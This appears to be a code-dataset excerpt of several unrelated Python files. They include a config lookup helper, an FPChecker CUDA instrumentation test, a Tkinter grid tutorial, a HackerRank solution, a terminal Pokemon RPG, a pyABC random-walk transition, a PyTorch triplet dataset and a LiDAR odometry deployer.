:param settings_name: alternative name for `settings` if specified
:param default_value: default value to be returned if not found anywhere, and exception raises are disabled.
:param raise_missing: raise exception if key is not found anywhere
:param print_missing: print message if key is not found anywhere, return ``None``
:param raise_not_set: raise an exception if the found key is ``None``, search until last case if others are ``None``
:returns: found value or `default_value`
:raises ValueError: if resulting value is invalid based on options (by default raise missing/``None`` value)
:raises LookupError: if no appropriate value could be found from all search locations (according to options)
"""
from cowbird.utils import get_settings, print_log, raise_log # pylint: disable=C0415 # avoid circular import error
if constant_name in COWBIRD_CONSTANTS:
return globals()[constant_name]
missing = True
cowbird_value = None
if settings_container:
settings = get_settings(settings_container)
else:
# note: this will work only after include of cowbird will have triggered configurator setup
print_log("Using settings from local thread.", level=logging.DEBUG)
settings = get_settings(get_current_registry())
if settings and constant_name in settings: # pylint: disable=E1135
missing = False
cowbird_value = settings.get(constant_name)
if cowbird_value is not None:
print_log("Constant found in settings with: {}".format(constant_name), level=logging.DEBUG)
return cowbird_value
if not settings_name:
settings_name = get_constant_setting_name(constant_name)
print_log("Constant alternate search: {}".format(settings_name), level=logging.DEBUG)
if settings and settings_name and settings_name in settings: # pylint: disable=E1135
missing = False
cowbird_value = settings.get(settings_name)
if cowbird_value is not None:
print_log("Constant found in settings with: {}".format(settings_name), level=logging.DEBUG)
return cowbird_value
cowbird_globals = globals()
if constant_name in cowbird_globals:
missing = False
cowbird_value = cowbird_globals.get(constant_name)
if cowbird_value is not None:
print_log("Constant found in definitions with: {}".format(constant_name), level=logging.DEBUG)
return cowbird_value
if constant_name in os.environ:
missing = False
cowbird_value = os.environ.get(constant_name)
if cowbird_value is not None:
print_log("Constant found in environment with: {}".format(constant_name), level=logging.DEBUG)
return cowbird_value
if not missing and raise_not_set:
raise_log("Constant was found but was not set: {}".format(constant_name),
level=logging.ERROR, exception=ValueError)
if missing and raise_missing:
raise_log("Constant could not be found: {}".format(constant_name),
level=logging.ERROR, exception=LookupError)
if missing and print_missing:
print_log("Constant could not be found: {} (using default: {})"
.format(constant_name, default_value), level=logging.WARN)
return cowbird_value or default_value
def validate_required(container):
# type: (AnySettingsContainer) -> None
"""
Validates that some value is provided for every mandatory configuration setting.
:raises: when any of the requirements are missing a definition.
"""
for cfg in _SETTINGS_REQUIRED:
get_constant(cfg, settings_container=container, raise_missing=True, raise_not_set=True)
| StarcoderdataPython |
11265408 | <reponame>ganeshutah/FPChecker
import os
import pathlib
import sys
import subprocess
sys.path.insert(1, str(pathlib.Path(__file__).parent.absolute())+"/../../../../parser")
#sys.path.insert(1, '/usr/workspace/wsa/laguna/fpchecker/FPChecker/parser')
from tokenizer import Tokenizer
from instrument import Instrument
RUNTIME='../../../../src/Runtime_parser.h'
prog_1 = """
__device__ double foo(double a);
__device__ void comp(double x) {
if (x = foo(3.0))
x = x*x;
}
"""
def setup_module(module):
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
def teardown_module(module):
cmd = ["rm -f *.o *.ii *.cu"]
cmdOutput = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
def preprocessFile(prog_name: str):
cmd = ['nvcc -E '+prog_name+'.cu -o '+prog_name+'.ii']
cmdOutput = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
def createFile(prog: str, prog_name: str):
with open(prog_name+'.cu', 'w') as fd:
fd.write(prog)
fd.write('\n')
preprocessFile(prog_name)
def instrument(prog_name: str):
pass
preFileName = prog_name+'.ii'
sourceFileName = prog_name+'.cu'
inst = Instrument(preFileName, sourceFileName)
inst.deprocess()
inst.findDeviceDeclarations()
inst.findAssigments()
inst.produceInstrumentedLines()
inst.instrument()
def compileProggram(prog_name: str):
cmd = ['nvcc -std=c++11 -c -include '+RUNTIME+' '+prog_name+'_inst.cu']
cmdOutput = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
def countInstrumentationCalls(prog_name: str):
ret = 0
with open(prog_name+'_inst.cu', 'r') as fd:
for l in fd.readlines():
for w in l.split():
if '_FPC_CHECK_' in w:
ret += 1
return ret
def inst_program(prog: str, prog_name: str, num_inst: int):
try:
createFile(prog, prog_name)
instrument(prog_name)
compileProggram(prog_name)
n = countInstrumentationCalls(prog_name)
assert n == num_inst
return True
except Exception as e:
print(e)
return False
def test_1():
os.environ['FPC_VERBOSE'] = '1'
assert inst_program(prog_1, 'prog_1', 1)
if __name__ == '__main__':
test_1()
| StarcoderdataPython |
47343 | <filename>Tkinter_Aula11_Gerenciador_de_Layout_GRID.py
#*************************************************************************************************
# GERENCIADOR DE LAYOUT GRID
#*************************************************************************************************
#INCLUDES
from tkinter import*
#CONSTANTES E DEFINIÇÕES
resolucao = '300x300+200+200'
#GUI
janela = Tk()
janela.geometry(resolucao)
bt1 = Button(janela, width=5, text='Botão 1')
bt2 = Button(janela, width=5, text='Botão 2')
bt3 = Button(janela, width=5, text='Botão 3')
bt4 = Button(janela, width=5, text='Botão 4')
#layout
bt1.grid(row=0, column=0) # row = linha , column = coluna. Componente na linha 0 coluna 0
bt2.grid(row=1, column=0)
bt3.grid(row=2, column=2)
bt4.grid(row=3, column=3)
janela.mainloop()
#O gerenciador de Layout Grid divide a tela em linhas e colunas, onde cada elemento está
#localizado dentro de um endereço formado pelo par linha-coluna.
| StarcoderdataPython |
11299580 | <reponame>GoTo-Coders/Competitive-Programming<gh_stars>1-10
# Link --> https://www.hackerrank.com/challenges/sparse-arrays/problem
# Code:
def matchingStrings(strings, queries):
answer = []
for i in range(len(queries)):
counter = 0
for j in range(len(strings)):
if queries[i] == strings[j]:
counter += 1
answer.append(counter)
return answer
| StarcoderdataPython |
1657714 | <gh_stars>0
import pickle
from pokemon import *
from pessoa import *
def escolher_pokemon_incial(player):
print(f"Olá {player}, agora você deve escolher o pokemon que lhe acompanhará nessa jornada!")
pk1 = PokemonAgua("Squirtle", level=1)
pk2 = PokemonFogo("Charmander", level=1)
pk3 = PokemonEletrico("Pikachu", level=1)
print("Você pode escolher entre estes três pokemons:")
print(f"[1] - {pk1.especie}\n[2] - {pk2.especie}\n[3] - {pk3.especie}")
while True:
escolha = str(input("Sua escolha >>> "))
if escolha == "1":
player.capturar(pk1)
break
elif escolha == "2":
player.capturar(pk2)
break
elif escolha == "3":
player.capturar(pk3)
break
else:
print("Você deve escolher 1, 2 ou 3!!!")
def save_game(player):
try:
with open("database.db", "wb") as arquivo:
pickle.dump(player, arquivo)
print("Jogo Salvo com sucesso!")
except Exception as erro:
print("Erro ao salvar")
print(erro)
def load_game():
try:
with open ("database.db", "rb") as arquivo:
player = pickle.load(arquivo)
print("Loading feito com sucesso!")
return player
except Exception as error:
print("Save não encontrado")
if __name__ == '__main__':
print("_"*50)
print("Bem Vindo ao pokemon RPG de terminal!")
print("_"*50)
player = load_game()
if not player:
nome = str(input("Olá, qual é o seu nome?\n>>>"))
player = Player(nome)
print("Olá esse é um mundo habitado por pokemons, sua missão é se tornar um mestre pokemon!")
print("Capture pokemons, batalhe, viva essa aventura!")
player.mostrar_dinheiro()
if player.pokemons:
print("Vejo que você já possui pokemons!")
player.mostrar_pokemons()
else:
print("Vejo que você não possui pokemons! Para começar escolha um destes!")
escolher_pokemon_incial(player)
print("Pronto, agora que você já possui pokemon, está na hora da sua primeira batalha!")
gary = Inimigo("Gary", pokemons=[PokemonAgua("Squirtle", 1)])
player.batalhar(gary)
save_game(player)
while True:
print("_"*50)
print("O que deseja fazer?")
print("[1] Explorar")
print("[2] Batalhar")
print("[3] Mostrar Pokeagenda")
print("[0] Sair do Jogo")
escolha = str(input(">>>"))
if escolha == "0":
print("Saindo do Jogo!")
sleep(1)
break
elif escolha == "1":
player.explorar()
save_game(player)
elif escolha == "2":
player.batalhar(Inimigo())
save_game(player)
elif escolha == "3":
player.mostrar_pokemons()
else:
print("Escolha inválida!")
| StarcoderdataPython |
152028 | <reponame>Gabriel-p/pyABC
from typing import Union
import numpy as np
import pandas as pd
import scipy.stats as stats
from ..parameters import Parameter
from .base import DiscreteTransition
class DiscreteRandomWalkTransition(DiscreteTransition):
"""
This transition is based on a discrete random walk. This may be useful
for discrete ordinal parameter distributions that can be described as
lying on the grid of integers.
.. note::
This transition does not adapt to the problem structure and thus has
potentially slow convergence.
Further, the transition does not satisfy proposal >> prior, so that
it is indeed not valid as an importance sampling distribution. This
can be overcome by selecting the number of steps as a random variable.
Parameters
----------
n_steps: int, optional (default = 1)
Number of random walk steps to take.
"""
def __init__(
self,
n_steps: int = 1,
p_l: float = 1.0 / 3,
p_r: float = 1.0 / 3,
p_c: float = 1.0 / 3,
):
self.n_steps = n_steps
self.p_l = p_l
self.p_r = p_r
self.p_c = p_c
def fit(self, X: pd.DataFrame, w: np.ndarray):
pass
def rvs_single(self) -> Parameter:
# take a step
dim = len(self.X.columns)
step = perform_random_walk(
dim, self.n_steps, self.p_l, self.p_r, self.p_c
)
# select a start point
start_point = self.X.sample(weights=self.w).iloc[0]
# create randomized point
perturbed_point = start_point + step
return Parameter(perturbed_point)
def pdf(
self, x: Union[Parameter, pd.Series, pd.DataFrame]
) -> Union[float, np.ndarray]:
"""
Evaluate the probability mass function (PMF) at `x`.
"""
# convert to numpy array in correct order
if isinstance(x, (Parameter, pd.Series)):
x = np.array([x[key] for key in self.X.columns])
else:
x = x[self.X.columns].to_numpy()
if not np.all(np.isclose(x, x.astype(int))):
raise ValueError(
f"Transition can only handle integer values, not fulfilled "
f"by x={x}."
)
if len(x.shape) == 1:
return self._pdf_single(x)
else:
return np.array([self._pdf_single(xi) for xi in x])
def _pdf_single(self, x: np.ndarray):
p = 0.0
for start, weight in zip(self.X.values, self.w):
# probability if started from start
p_start = calculate_single_random_walk_probability(
start, x, self.n_steps, self.p_l, self.p_r, self.p_c
)
# add p_start times the weight associated to p_start
p += p_start * weight
return p
def perform_random_walk(dim, n_steps, p_l, p_r, p_c):
"""
Perform a random walk in [-1, 0, 1] in each dimension, for `n_steps`
steps.
"""
state = np.zeros(dim)
for _ in range(n_steps):
# sample a step
step = np.random.choice(a=[-1, 0, 1], p=[p_l, p_c, p_r], size=dim)
state += step
return state
def calculate_single_random_walk_probability(
start,
end,
n_steps,
p_l: float = 1.0 / 3,
p_r: float = 1.0 / 3,
p_c: float = 1.0 / 3,
):
"""
Calculate the probability of getting from state `start` to state `end`
in `n_steps` steps, where the probabilities for a left, right, and
no step are `p_l`, `p_r`, `p_c`, respectively.
"""
step = end - start
p = 1.0
for step_j in step:
p_j = 0.0
for n_r in range(max(int(step_j), 0), n_steps + 1):
n_l = n_r - step_j
n_c = n_steps - n_r - n_l
p_j += stats.multinomial.pmf(
x=[n_l, n_r, n_c], n=n_steps, p=[p_l, p_r, p_c]
)
p *= p_j
return p
def calculate_single_random_walk_probability_no_stay(start, end, n_steps):
"""
Calculate the probability of getting from state `start` to state `end`
in `n_steps` steps. Simplified formula assuming the probability to remain
in a given state is zero in each iteration, i.e. that in every step
there is a move to the left or right.
Note that the iteration of this transition is not surjective on the grid
in dimension dim >= 2.
"""
step = end - start
p = 1.0
for step_j in step:
if (step_j + n_steps) % 2 != 0:
# impossible to get there
return 0.0
n_r = int(0.5 * (n_steps + step_j))
p_j = stats.binom.pmf(n=n_steps, p=0.5, k=n_r)
p *= p_j
return p
| StarcoderdataPython |
3559437 | import os
import random
import pandas as pd
from PIL import Image
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
random.seed(16)
class CRC_Dataset(Dataset):
def __init__(self, args):
super(CRC_Dataset, self).__init__()
self.args = args
self.transformations = transforms.Compose([transforms.Resize((256,256)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
self.rand_transforms = transforms.Compose([transforms.RandomApply(transforms=[transforms.RandomRotation(degrees=(0.180)),
transforms.RandomVerticalFlip(),
transforms.RandomHorizontalFlip()]),
transforms.ToTensor(),
transforms.RandomErasing(p=0.8),
transforms.ToPILImage(),
transforms.Resize((256, 256)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
self.df = pd.DataFrame(columns=['filepath', 'label'])
data_root = os.path.join(args.data_dir, 'train')
dir2label = {'Anger':0, 'Boredom':1, 'Disgust':2, 'Fear':3, 'Happiness':4, 'Neutral':5, 'Sadness':6}
for dir in os.listdir(data_root):
dir_path = os.path.join(data_root, dir)
if os.path.isdir(dir_path):
for img in os.listdir(dir_path):
img_path = os.path.join(dir_path, img)
img_label = dir2label[dir]
self.df = self.df.append({'filepath': img_path, 'label': img_label}, ignore_index=True)
print(f"DML Training dataset contains {len(self.df)} images !!")
def __len__(self):
return len(self.df)
def __getitem__(self, index):
sample = {}
# 1. get the file paths
anchor_path = self.df.iloc[index]['filepath']
positive_path, negative_path = None, None
remaining_list = list(range(len(self.df)))
remaining_list.remove(index)
while True:
p_rand = random.randint(0, len(remaining_list) - 1)
if p_rand != index and self.df.iloc[p_rand]['label'] == self.df.iloc[index]['label']: # same label
positive_path = self.df.iloc[p_rand]['filepath']
remaining_list.remove(p_rand)
break
while True:
n_rand = random.randint(0, len(remaining_list) - 1)
if n_rand != index and self.df.iloc[n_rand]['label'] != self.df.iloc[index]['label']: # different label
negative_path = self.df.iloc[n_rand]['filepath']
remaining_list.remove(n_rand)
break
# verification
assert (positive_path is not None and negative_path is not None)
assert (self.df.iloc[index]['label'] == self.df.iloc[p_rand]['label'] and self.df.iloc[index]['label'] != self.df.iloc[n_rand]['label'])
# 2. get the respective images
anchor_image_ = Image.open(anchor_path).convert('RGB')
positive_image = Image.open(positive_path).convert('RGB')
negative_image = Image.open(negative_path).convert('RGB')
# 3. apply transforms
anchor_image = self.transformations(anchor_image_)
positive_image = self.transformations(positive_image)
negative_image = self.transformations(negative_image)
anchor_augment = self.rand_transforms(anchor_image_)
# 4. form the sample dict
sample = {'anchor_image' : anchor_image, 'anchor_path' : anchor_path, 'anchor_augment' : anchor_augment,
'positive_image' : positive_image, 'positive_path' : positive_path,
'negative_image': negative_image, 'negative_path': negative_path
}
return sample
def get_dataloader(args):
dset = CRC_Dataset(args)
data_loader = DataLoader(dset, batch_size=args.batchsize, shuffle=True, num_workers=8)
return data_loader | StarcoderdataPython |
157813 | <reponame>tallandroid/incubator-marvin
#!/usr/bin/env python
# coding=utf-8
from .prediction_preparator import PredictionPreparator
from .predictor import Predictor
from .feedback import Feedback
| StarcoderdataPython |
307517 | #!/usr/bin/env python3
# Copyright 2021 by <NAME>, Robotic Systems Lab, ETH Zurich.
# All rights reserved.
# This file is released under the "BSD-3-Clause License".
# Please see the LICENSE file that has been included as part of this package.
import copy
import math
import torch
import mlflow
import numpy as np
import utility.plotting
import utility.poses
import utility.projection
import data.dataset
import models.model
import losses.icp_losses
class Deployer(object):
def __init__(self, config):
torch.cuda.empty_cache()
# Parameters and data
self.config = config
self.device = config["device"]
self.batch_size = config["batch_size"]
self.dataset = data.dataset.PreprocessedPointCloudDataset(config=config)
self.steps_per_epoch = int(len(self.dataset) / self.batch_size)
if self.config["mode"] == "testing":
self.ground_truth_dataset = data.dataset.PoseDataset(config=self.config)
# Projections and model
self.img_projection = utility.projection.ImageProjectionLayer(config=config)
if self.config["use_jit"]:
datasets = self.config["datasets"]
## Need to provide example tensor for torch jit
example_tensor = torch.zeros((1, 4,
self.config[datasets[0]]["vertical_cells"],
self.config[datasets[0]]["horizontal_cells"]),
device=self.device)
del datasets
self.model = torch.jit.trace(
models.model.OdometryModel(config=self.config).to(self.device),
example_inputs=(example_tensor, example_tensor))
else:
self.model = models.model.OdometryModel(config=self.config).to(self.device)
# Geometry handler
self.geometry_handler = models.model_parts.GeometryHandler(config=config)
# Loss and optimizer
self.lossTransformation = torch.nn.MSELoss()
self.lossPointCloud = losses.icp_losses.ICPLosses(config=self.config)
self.lossBCE = torch.nn.BCELoss()
self.training_bool = False
# Permanent variables for internal use
self.log_img_1 = []
self.log_img_2 = []
self.log_img_2_transformed = []
self.log_pointwise_loss = []
self.log_normals_target = []
self.log_normals_transformed_source = []
@staticmethod
def list_collate(batch_dicts):
data_dicts = [batch_dict for batch_dict in batch_dicts]
return data_dicts
def create_images(self, preprocessed_data, losses, plotting):
## Create image of target normals
image_1_at_normals, _, _, _, _ = self.img_projection(input=torch.cat((
preprocessed_data["scan_1"],
preprocessed_data["normal_list_1"]), dim=1), dataset=preprocessed_data["dataset"])
## Create image for points where normals exist (in source and target)
image_2_transformed_and_normals_and_pointwise_loss, _, _, _, _ = \
self.img_projection(input=torch.cat((plotting["scan_2_transformed"],
plotting["normals_2_transformed"],
losses["loss_po2pl_pointwise"]), dim=1),
dataset=preprocessed_data["dataset"])
self.log_pointwise_loss = image_2_transformed_and_normals_and_pointwise_loss[:, 6:9]
self.log_normals_target = image_1_at_normals[:, 3:6]
self.log_normals_transformed_source = image_2_transformed_and_normals_and_pointwise_loss[
:, 3:6]
def log_image(self, epoch, string):
utility.plotting.plot_lidar_image(
input=[self.log_img_1, self.log_img_2, self.log_img_2_transformed,
self.log_pointwise_loss, self.log_normals_target,
self.log_normals_transformed_source],
label="target",
iteration=(epoch + 1) * self.steps_per_epoch if self.training_bool else epoch,
path="/tmp/" + self.config["run_name"] + "_" + format(epoch, '05d') + string + ".png",
training=self.training_bool)
mlflow.log_artifact("/tmp/" + self.config["run_name"] + "_" + format(epoch, '05d') + string + ".png")
def log_map(self, index_of_dataset, index_of_sequence, dataset, data_identifier):
gt_translations = self.ground_truth_dataset.return_translations(
index_of_dataset=index_of_dataset, index_of_sequence=index_of_sequence)
gt_poses = self.ground_truth_dataset.return_poses(
index_of_dataset=index_of_dataset, index_of_sequence=index_of_sequence)
# Extract transformations and absolute poses
computed_transformations = self.computed_transformations_datasets[index_of_dataset][
index_of_sequence]
computed_poses = utility.poses.compute_poses(
computed_transformations=computed_transformations)
# Log things to mlflow artifacts
utility.poses.write_poses_to_text_file(
file_name="/tmp/" + self.config["run_name"] + "_poses_text_file_" + dataset + "_" + format(data_identifier,
'02d') + ".txt",
poses=computed_poses)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_poses_text_file_" + dataset + "_" + format(data_identifier,
'02d') + ".txt")
np.save(
"/tmp/" + self.config["run_name"] + "_transformations_" + dataset + "_" + format(data_identifier,
'02d') + ".npy",
computed_transformations)
np.save(
"/tmp/" + self.config["run_name"] + "_poses_" + dataset + "_" + format(data_identifier, '02d') + ".npy",
computed_poses)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_transformations_" + dataset + "_" + format(data_identifier,
'02d') + ".npy")
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_poses_" + dataset + "_" + format(data_identifier, '02d') + ".npy")
utility.plotting.plot_map(computed_poses=computed_poses,
path_y="/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(
data_identifier, '02d') + "_y.png",
path_2d="/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(
data_identifier, '02d') + "_2d.png",
path_3d="/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(
data_identifier, '02d') + "_3d.png",
groundtruth=gt_translations,
dataset=dataset)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(data_identifier, '02d') + "_y.png")
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(data_identifier, '02d') + "_2d.png")
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_map_" + dataset + "_" + format(data_identifier, '02d') + "_3d.png")
if gt_poses is not None:
utility.plotting.plot_translation_and_rotation(
computed_transformations=np.asarray(computed_transformations),
path="/tmp/" + self.config["run_name"] + "_plot_trans_rot_" + dataset + "_" + format(data_identifier,
'02d') + ".pdf",
groundtruth=gt_poses,
dataset=dataset)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_plot_trans_rot_" + dataset + "_" + format(data_identifier,
'02d') + ".pdf")
def log_config(self):
for dict_entry in self.config:
mlflow.log_param(dict_entry, self.config[dict_entry])
def transform_image_to_point_cloud(self, transformation_matrix, image):
point_cloud_transformed = torch.matmul(transformation_matrix[:, :3, :3],
image[:, :3, :, :].view(-1, 3, image.shape[2] *
image.shape[3]))
index_array_not_zero = (point_cloud_transformed[:, 0] != torch.zeros(1).to(
self.device)) | (point_cloud_transformed[:, 1] != torch.zeros(1).to(self.device)) | (
point_cloud_transformed[:, 2] != torch.zeros(1).to(
self.device))
for batch_index in range(len(point_cloud_transformed)):
point_cloud_transformed_batch = point_cloud_transformed[batch_index, :,
index_array_not_zero[batch_index]] + \
transformation_matrix[batch_index, :3, 3].view(1, 3, -1)
point_cloud_transformed = point_cloud_transformed_batch
return point_cloud_transformed
def rotate_point_cloud_transformation_matrix(self, transformation_matrix, point_cloud):
return transformation_matrix[:, :3, :3].matmul(point_cloud[:, :3, :])
def transform_point_cloud_transformation_matrix(self, transformation_matrix, point_cloud):
transformed_point_cloud = self.rotate_point_cloud_transformation_matrix(
transformation_matrix=transformation_matrix,
point_cloud=point_cloud)
transformed_point_cloud += transformation_matrix[:, :3, 3].view(-1, 3, 1)
return transformed_point_cloud
def rotate_point_cloud_euler_vector(self, euler, point_cloud):
translation = torch.zeros(3, device=self.device)
euler = euler.to(self.device)
transformation_matrix = self.geometry_handler.get_transformation_matrix_angle_axis(
translation=translation,
euler=euler, device=self.device)
return self.transform_point_cloud_transformation_matrix(
transformation_matrix=transformation_matrix,
point_cloud=point_cloud)
def augment_input(self, preprocessed_data):
# Random rotation
if self.config["random_point_cloud_rotations"]:
raise Exception("Needs to be verified for larger batches")
if self.config["random_rotations_only_yaw"]:
direction = torch.zeros((1, 3), device=self.device)
direction[0, 2] = 1
else:
direction = (torch.rand((1, 3), device=self.device))
direction = direction / torch.norm(direction)
magnitude = (torch.rand(1, device=self.device) - 0.5) * (
self.config["magnitude_random_rot"] / 180.0 * torch.Tensor([math.pi]).to(
self.device))
euler = direction * magnitude
preprocessed_data["scan_2"] = self.rotate_point_cloud_euler_vector(
point_cloud=preprocessed_data["scan_2"], euler=euler)
preprocessed_data["normal_list_2"] = self.rotate_point_cloud_euler_vector(
point_cloud=preprocessed_data["normal_list_2"], euler=euler)
return preprocessed_data
def normalize_input(self, preprocessed_data):
ranges_1 = torch.norm(preprocessed_data["scan_1"], dim=1)
ranges_2 = torch.norm(preprocessed_data["scan_2"], dim=1)
means_1 = torch.mean(ranges_1, dim=1, keepdim=True)
means_2 = torch.mean(ranges_2, dim=1, keepdim=True)
# Normalization mean is mean of both means (i.e. independent of number of points of each scan)
means_1_2 = torch.cat((means_1, means_2), dim=1)
normalization_mean = torch.mean(means_1_2, dim=1)
preprocessed_data["scan_1"] /= normalization_mean
preprocessed_data["scan_2"] /= normalization_mean
preprocessed_data["scaling_factor"] = normalization_mean
return preprocessed_data, normalization_mean
def step(self, preprocessed_dicts, epoch_losses=None, log_images_bool=False):
# Use every batchindex separately
images_model_1 = torch.zeros(self.batch_size, 4,
self.config[preprocessed_dicts[0]["dataset"]]["vertical_cells"],
self.config[preprocessed_dicts[0]["dataset"]]["horizontal_cells"],
device=self.device)
images_model_2 = torch.zeros_like(images_model_1)
for index, preprocessed_dict in enumerate(preprocessed_dicts):
if self.training_bool:
preprocessed_dict = self.augment_input(preprocessed_data=preprocessed_dict)
if self.config["normalization_scaling"]:
preprocessed_data, scaling_factor = self.normalize_input(preprocessed_data=preprocessed_dict)
# Training / Testing
image_1, _, _, point_cloud_indices_1, _ = self.img_projection(
input=preprocessed_dict["scan_1"], dataset=preprocessed_dict["dataset"])
image_2, _, _, point_cloud_indices_2, image_to_pc_indices_2 = self.img_projection(
input=preprocessed_dict["scan_2"], dataset=preprocessed_dict["dataset"])
## Only keep points that were projected to image
preprocessed_dict["scan_1"] = preprocessed_dict["scan_1"][:, :, point_cloud_indices_1]
preprocessed_dict["normal_list_1"] = preprocessed_dict["normal_list_1"][:, :, point_cloud_indices_1]
preprocessed_dict["scan_2"] = preprocessed_dict["scan_2"][:, :, point_cloud_indices_2]
preprocessed_dict["normal_list_2"] = preprocessed_dict["normal_list_2"][:, :, point_cloud_indices_2]
image_model_1 = image_1[0]
image_model_2 = image_2[0]
# Write projected image to batch
images_model_1[index] = image_model_1
images_model_2[index] = image_model_2
images_to_pcs_indices_2 = [image_to_pc_indices_2]
self.log_img_1 = image_1[:, :3]
self.log_img_2 = image_2[:, :3]
# Feed into model as batch
(translations, rotation_representation) = self.model(image_1=images_model_1,
image_2=images_model_2)
computed_transformations = self.geometry_handler.get_transformation_matrix_quaternion(
translation=translations, quaternion=rotation_representation, device=self.device)
# Following part only done when loss needs to be computed
if not self.config["inference_only"]:
# Iterate through all transformations and compute loss
losses = {
"loss_pc": torch.zeros(1, device=self.device),
"loss_po2po": torch.zeros(1, device=self.device),
"loss_po2pl": torch.zeros(1, device=self.device),
"loss_po2pl_pointwise": torch.zeros(1, device=self.device),
"loss_pl2pl": torch.zeros(1, device=self.device),
}
for batch_index, computed_transformation in enumerate(computed_transformations):
computed_transformation = torch.unsqueeze(computed_transformation, 0)
preprocessed_dict = preprocessed_dicts[batch_index]
scan_2_transformed = self.transform_point_cloud_transformation_matrix(
transformation_matrix=computed_transformation,
point_cloud=preprocessed_dict["scan_2"])
normal_list_2_transformed = self.rotate_point_cloud_transformation_matrix(
transformation_matrix=computed_transformation,
point_cloud=preprocessed_dict["normal_list_2"])
## Losses
losses_trafo, plotting_step = self.lossPointCloud(
source_point_cloud_transformed=scan_2_transformed,
source_normal_list_transformed=normal_list_2_transformed,
target_point_cloud=preprocessed_dict["scan_1"],
target_normal_list=preprocessed_dict["normal_list_1"],
compute_pointwise_loss_bool=log_images_bool)
losses["loss_po2po"] += losses_trafo["loss_po2po"]
losses["loss_po2pl"] += self.config["lambda_po2pl"] * losses_trafo["loss_po2pl"]
losses["loss_pl2pl"] += losses_trafo["loss_pl2pl"]
losses["loss_pc"] += (losses["loss_po2po"] + losses["loss_po2pl"] + losses["loss_pl2pl"])
## Image of transformed source point cloud
## Sparser if loss is only taken on image points, only for first index
if batch_index == 0:
image_2_transformed, u_pixel, v_pixel, _, _ = \
self.img_projection(input=scan_2_transformed,
dataset=preprocessed_dict["dataset"])
self.log_img_2_transformed = image_2_transformed
losses["loss_po2pl_pointwise"] = losses_trafo["loss_po2pl_pointwise"]
plotting = plotting_step
if not self.config["unsupervised_at_start"]:
target_transformation = torch.eye(4, device=self.device).view(1, 4, 4)
loss_transformation = self.lossTransformation(input=computed_transformation,
target=target_transformation)
losses["loss_pc"] /= self.batch_size
losses["loss_po2po"] /= self.batch_size
losses["loss_po2pl"] /= self.batch_size
losses["loss_pl2pl"] /= self.batch_size
if not self.config["unsupervised_at_start"]:
loss_transformation /= self.batch_size
loss = loss_transformation # Overwrite loss for identity fitting
else:
loss = losses["loss_pc"]
if self.training_bool:
loss.backward()
self.optimizer.step()
if self.config["normalization_scaling"]:
for index, preprocessed_dict in enumerate(preprocessed_dicts):
computed_transformations[index, :3, 3] *= preprocessed_dict["scaling_factor"]
# Visualization
if not log_images_bool:
_, u_pixel, v_pixel, _, _ = \
self.img_projection(input=scan_2_transformed,
dataset=preprocessed_dicts[0]["dataset"])
elif not self.config["po2po_alone"]:
self.create_images(preprocessed_data=preprocessed_dicts[0],
losses=losses,
plotting=plotting)
epoch_losses["loss_epoch"] += loss.detach().cpu().numpy()
epoch_losses["loss_point_cloud_epoch"] += (
losses["loss_pc"].detach().cpu().numpy())
epoch_losses["loss_po2po_epoch"] += losses["loss_po2po"].detach().cpu().numpy()
epoch_losses["loss_po2pl_epoch"] += losses["loss_po2pl"].detach().cpu().numpy()
epoch_losses["loss_pl2pl_epoch"] += losses["loss_pl2pl"].detach().cpu().numpy()
epoch_losses["visible_pixels_epoch"] += np.sum(
((torch.round(v_pixel.detach()) < self.config[preprocessed_dicts[0]["dataset"]][
"vertical_cells"]) & (v_pixel.detach() > torch.zeros(1).to(self.device))).cpu().numpy())
return epoch_losses, computed_transformations
else:
if self.config["normalization_scaling"]:
for index, preprocessed_dict in enumerate(preprocessed_dicts):
computed_transformations[index, :3, 3] *= preprocessed_dict["scaling_factor"]
return computed_transformations
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.